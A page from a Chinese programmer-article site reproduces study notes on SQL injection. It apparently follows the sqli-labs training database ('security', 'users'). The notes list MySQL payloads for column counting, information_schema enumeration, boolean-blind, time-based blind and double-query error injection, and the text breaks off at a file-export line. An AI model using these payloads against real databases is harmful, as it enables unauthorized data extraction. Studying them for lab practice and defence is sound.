欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

SQL注入学习笔记(一)

程序员文章站 2022-06-23 15:49:25
空格是%20,单引号是%27, 井号是%23,双引号是%22 //常见urlencode order by 3 //猜字段个数 select 1, 2, 3 //增加临时列 mysqli_fetch...

空格是%20,单引号是%27, 井号是%23,双引号是%22 //常见urlencode

order by 3 //猜字段个数

select 1, 2, 3 //增加临时列

mysqli_fetch_array(conn,sql) //返回第一行记录

concat_ws(char(32,58,32), ‘语句1’, ‘语句2’…) //连接成字符串

limit 0,1 //选定待查询的记录行

substr((%s),1,1)

//爆库, 爆表, 爆字段

database: information_schema(包含了mysql服务器所有信息)

table: schemata (schema_name)

tables (table_schema, table_name)

columns (table_schema, table_name, column_name)

//布尔盲注

and length(database())>=0 %23

and ascii(substr(database(),1,1))>=0 %23

and (select count(table_name) from information_schema.tables where table_schema=’security’)>=0 %23

and (select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1)>=0 %23

and ascii(substr(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)>=0 %23

and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=0 %23

and (select length(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)>=0 %23

and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1))>=0 %23

//基于时间盲注

and if((注入布尔判断语句), 1, sleep(5)) %23

//聚合函数+分组语句->双注入

union select 1 from (select count(*), concat(floor(rand()*2), (注入爆数据语句))a from information_schema.tables group by a)b%23

//导出文件

select “